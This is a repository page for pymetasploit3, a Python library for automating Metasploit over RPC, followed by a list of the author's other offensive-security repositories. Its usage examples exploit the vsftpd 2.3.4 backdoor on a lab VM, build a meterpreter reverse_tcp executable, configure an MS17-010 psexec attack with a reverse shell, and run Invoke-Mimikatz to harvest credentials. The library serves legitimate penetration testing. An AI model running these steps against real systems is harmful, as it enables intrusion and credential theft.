• Stars
    star
    370
  • Rank 115,405 (Top 3 %)
  • Language
    PowerShell
  • License
    MIT License
  • Created over 5 years ago
  • Updated 8 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Automation library for Metasploit

Pymetasploit3

Pymetasploit3 is a full-fledged Python3 Metasploit automation library. It can interact with Metasploit either through msfrpcd or the msgrpc plugin in msfconsole.

Original library: pymetasploit

This is an updated and improved version of the Python2 pymetasploit library by allfro.

Original project : https://github.com/allfro/pymetasploit

Installation

mkdir your-project
cd your-project
pipenv install --three pymetasploit3
pipenv shell

or:

pip3 install --user pymetasploit3

Basic Usage

Starting Metasploit RPC server

You can start the RPC server either with msfrpcd or msfconsole

Msfconsole

This will start the RPC server on port 55552 as well as the Metasploit console UI

$ msfconsole
msf> load msgrpc [Pass=yourpassword]

msfrpcd

This will start the RPC server on port 55553 and will just start the RPC server in the background

$ msfrpcd -P yourpassword 

RPC client

Connecting to msfrpcd

>>> from pymetasploit3.msfrpc import MsfRpcClient
>>> client = MsfRpcClient('yourpassword', ssl=True)

Connecting to msfconsole with msgrpc plugin loaded

>>> from pymetasploit3.msfrpc import MsfRpcClient
>>> client = MsfRpcClient('yourpassword', port=55552, True)

MsfRpcClient

The MsfRpcClient class provides the core functionality to navigate through the Metasploit framework. Use dir(client) to see the callable methods.

>>> [m for m in dir(client) if not m.startswith('_')]
['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins',
'port', 'server', 'token', 'sessions', 'ssl', 'uri']
>>>

Like the metasploit framework, MsfRpcClient is segmented into different management modules:

  • auth: manages the authentication of clients for the msfrpcd daemon.
  • consoles: manages interaction with consoles/shells created by Metasploit modules.
  • core: manages the Metasploit framework core.
  • db: manages the backend database connectivity for msfrpcd.
  • modules: manages the interaction and configuration of Metasploit modules (i.e. exploits, auxiliaries, etc.)
  • plugins: manages the plugins associated with the Metasploit core.
  • sessions: manages the interaction with Metasploit meterpreter sessions.

Running an exploit

Explore exploit modules:

>>> client.modules.exploits
['windows/wins/ms04_045_wins', 'windows/winrm/winrm_script_exec', 'windows/vpn/safenet_ike_11',
'windows/vnc/winvnc_http_get', 'windows/vnc/ultravnc_viewer_bof', 'windows/vnc/ultravnc_client', ...
'aix/rpc_ttdbserverd_realpath', 'aix/rpc_cmsd_opcode21']
>>>

Create an exploit module object:

>>> exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
>>>

Explore exploit information:

>>>  print(exploit.description)

          This module exploits a malicious backdoor that was added to the	VSFTPD download
          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
          June 30th 2011 and July 1st 2011 according to the most recent information
          available. This backdoor was removed on July 3rd 2011.

>>> exploit.options
['TCP::send_delay', 'ConnectTimeout', 'SSLVersion', 'VERBOSE', 'SSLCipher', 'CPORT', 'SSLVerifyMode', 'SSL', 'WfsDelay',
'CHOST', 'ContextInformationFile', 'WORKSPACE', 'EnableContextEncoding', 'TCP::max_send_size', 'Proxies',
'DisablePayloadHandler', 'RPORT', 'RHOSTS']
>>> exploit.missing_required # Required options which haven't been set yet
['RHOSTS']
>>>

Let's use a Metasploitable 2 instance running on a VMWare machine as our exploit target. It's running our favorite version of vsFTPd - 2.3.4 - and we already have our exploit module loaded. Our next step is to specify our target:

>>> exploit['RHOSTS'] = '172.16.14.145' # IP of our target host
>>>

Select a payload:

>>> exploit.targetpayloads()
['cmd/unix/interact']
>>>

At this point, this exploit only supports one payload (cmd/unix/interact). So let's pop a shell:

>>> exploit.execute(payload='cmd/unix/interact')
{'job_id': 1, 'uuid': '3whbuevf'}
>>>

We know the job ran successfully because job_id is 1. If the module failed to execute for any reason, job_id would be None. If we managed to pop our box, we might see something nice in the sessions list:

>>> client.sessions.list
{1: {'info': '', 'username': 'jsmith', 'session_port': 21, 'via_payload': 'payload/cmd/unix/interact',
'uuid': '5orqnnyv', 'tunnel_local': '172.16.14.1:58429', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',
'exploit_uuid': '3whbuevf', 'tunnel_peer': '172.16.14.145:6200', 'workspace': 'false', 'routes': '',
'target_host': '172.16.14.145', 'type': 'shell', 'session_host': '172.16.14.145', 'desc': 'Command shell'}}
>>>

generate a payload

Create a payload module object:

payload = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')

View module information as described above

Setting runoptions and generate payload

# set runoptions
payload.runoptions['BadChars'] = ''
payload.runoptions['Encoder'] = ''
payload.runoptions['Format'] = 'exe
payload.runoptions['NopSledSize'] = 0
payload.runoptions['ForceEncode'] = False
# payload.runoptions['Template'] = ''
payload.runoptions['Platform'] = ''
# payload.runoptions['KeepTemplateWorking'] = True
payload.runoptions['Iterations'] = 0

data = payload.payload_generate()
if isinstance(data, str):
    print(data)
else:
    with open('test.exe', 'wb') as f:
        f.write(data)

Interacting with the shell

Create a shell object out of the session number we found above and write to it:

>>> shell = client.sessions.session('1')
>>> shell.write('whoami')
>>> print(shell.read())
root
>>>

Run the same exploit object as before but wait until it completes and gather it's output:

>>> cid = client.consoles.console().cid # Create a new console and store its number in 'cid'
>>> print(client.consoles.console(cid).run_module_with_output(exploit, payload='cmd/unix/interact'))
# Some time passes
'[*] 172.16.14.145:21 - Banner: 220 vsFTPd 2.3.4
[*] 172.16.14.145:21 - USER: 331 Please specify the password
...'

client.sessions.session('1') has the same .write('some string') and .read() methods, but running session commands and waiting until they're done returning output isn't as simple as console commands. The Metasploit RPC server will return a busy value that is True or False with client.consoles.console('1').is_busy() but determining if a client.sessions.session() is done running a command requires us to do it by hand. For this purpose we will use a list of strings that, when any one is found in the session's output, will tell us that the session is done running its command. Below we are running the arp command within a meterpreter session. We know this command will return one large blob of text that will contain the characters ---- if it's successfully run so we put that into a list object.

>>> session_id = '1'
>>> session_command = 'arp'
>>> terminating_strs = ['----']
>>> client.sessions.session(session_id).run_with_output(session_command, terminating_strs)
# Some time passes
'\nARP Table\n                  ---------------\n  ...`

Run a PowerShell script with output

>>> session_id = '1'
>>> psh_script_path  = '/home/user/scripts/Invoke-Mimikatz.ps1'
>>> session = c.sessions.session(sessions_id)
>>> sessions.import_psh(psh_script_path)
>>> sessions.run_psh_cmd('Invoke-Mimikatz')
# Some time passes
'Mimikatz output...'

One can also use a timeout and simply return all data found before the timeout expired. timeout defaults to Metasploit's comm timeout of 300s and will throw an exception if the command timed out. To change this, set timeout_exception to False and the library will simply return all the data from the session output it found before the timeout expired.

>>> session_id = '1'
>>> session_command = 'arp'
>>> terminating_strs = ['----']
>>> client.sessions.session(session_id).run_with_output(session_command, terminating_strs, timeout=10, timeout_exception=False))
# 10s pass
'\nARP Table\n                  ---------------\n  ...`

Configuring payload options

For some usecases you might need to specify payload options, here's an example on how to do so.

exploit = client.modules.use('exploit', 'windows/smb/ms17_010_psexec')
exploit['RHOSTS'] = '172.28.128.13'
payload = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')
payload['LHOST'] = '172.28.128.1'
payload['LPORT'] = 4444
exploit.execute(payload=payload)

More examples

Many other usage examples can be found in the example_usage.py file.

Contributions

I highly encourage contributors to send in any and all pull requests or issues. Thank you to allfro for writing the original pymetasploit library.

More Repositories

1

wifijammer

Continuously jam all wifi clients/routers
Python
3,982
star
2

LANs.py

Inject code and spy on wifi users
Python
2,583
star
3

net-creds

Sniffs sensitive data from interface or pcap
Python
1,689
star
4

xsscrapy

XSS spider - 66/66 wavsep XSS detected
Python
1,648
star
5

icebreaker

Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment
PowerShell
1,182
star
6

pentest-machine

Automates some pentest jobs via nmap xml file
Ruby
319
star
7

dnsspoof

DNS spoofer. Drops DNS responses from the router and replaces it with the spoofed DNS response
Python
276
star
8

fakeAP

Create fake AP in Kali with 1 command
Python
265
star
9

elite-proxy-finder

Finds public elite anonymity proxies and concurrently tests them
Python
249
star
10

msf-autoshell

Feed the tool a .nessus file and it will automatically get you MSF shell
Python
234
star
11

creds.py

Harvest FTP/POP/IMAP/HTTP/IRC creds
Python
166
star
12

fast-recon

Does some google dorks against a domain
Python
158
star
13

device-pharmer

Opens 1K+ IPs or Shodan search results and attempts to login
Python
144
star
14

wifi-monitor

Prints the IPs on your local network that're sending the most packets
Python
142
star
15

msf-autopwn

Autoexploitation of some of the most common vulnerabilities in wild
Python
123
star
16

search-google

Scrape google search results
Python
93
star
17

autorelay

Automatically performs the SMB relay attack
Python
71
star
18

msfbot

WORK IN PROGRESS. Waits for MSF session then automatically gets domain admin
PowerShell
64
star
19

get_proxy

Py class that returns fastest http proxy
Python
54
star
20

best-channel

Find wifi channel with least interference
Python
52
star
21

SMB-reverse-brute

Async'ly gather unique usernames thru null SMB sessions and bruteforce them with 2 passwords
Python
51
star
22

Invoke-Cats

Obfuscated Invoke-Mimikatz
PowerShell
51
star
23

shellshock-hunter

Concurrently test bing results for shellshock vulnerability
Python
42
star
24

Autobloodhound

Automatically parses and attacks BloodHound-generated graphs
Python
41
star
25

smb-autopwn

Discovers and exploits hosts vulnerable to MS08-067/MS17-010
Python
41
star
26

autoresp

Runs Responder, uploads hashes for cracking, alerts when cracked
Python
37
star
27

FuzzStrings

Simple, hand-picked list of fuzz strings
Python
32
star
28

cookiejack

ARP spoof then session jack within your browser
Python
27
star
29

shellshock-hunter-google

Search google for shellshock vulnerable sites
Python
27
star
30

crawler.py

async web crawler
Python
26
star
31

nmap-parser

Parses Nmap XML files
Python
25
star
32

net-sniffer

Sniffs an interface/pcap file and concatenates fragmented packet loads
Python
21
star
33

MsfWrapper

Asynchronous MSF RPC API wrapper
Python
20
star
34

shodan-search

Python
19
star
35

WPSmash

Python
17
star
36

mailspy

Catch IMAP/POP passwords and see incoming and outgoing messages
Python
17
star
37

arp-ping-detector

ARP ping detector on local network
Python
15
star
38

Obf-Cats

Obfuscated Invoke-Mimikatz script
PowerShell
15
star
39

injecthtml

injecthtml
Python
12
star
40

async-meterpreter-controller

Template for asynchronously controlling meterpreter sessions
Python
12
star
41

postanalyzer

Analyze and log POSTs your machine makes
Python
11
star
42

search-bing

Search bing with python
Python
11
star
43

flashforge-finder-api

FlashForge Finder 3D Printer API with temperature control
Python
10
star
44

joomla-addon-hunter

Find potential SQLi in Joomla URLs
Python
8
star
45

vimrc

My .vimrc
Vim Script
8
star
46

UfcstatsScraper

Scrapes ufcstats.com for data
Python
8
star
47

BestfightoddsScraper

Asynchronously scrape bestfightodds.com for odds data
Python
7
star
48

Invoke-Pwds

Obfuscated Invoke-PowerDump for SAM hash retrieval
PowerShell
7
star
49

basic-xss-spider

sort of functional - abandoned
Python
6
star
50

arpdet

Detects and deauths arp spoofers automatically. Broken.
Python
5
star
51

SherdogScraper

Scrapes sherdog.com for fights
Python
4
star
52

async-requests

Python
3
star
53

quickscan

beta
Python
2
star
54

bashrc

My bashrc
Shell
2
star
55

Dating-service

Written by kid I was teaching python to.
Python
2
star
56

mma

Python
1
star
57

dotfiles

Dotfiles
Vim Script
1
star
58

UFCScraper

Python
1
star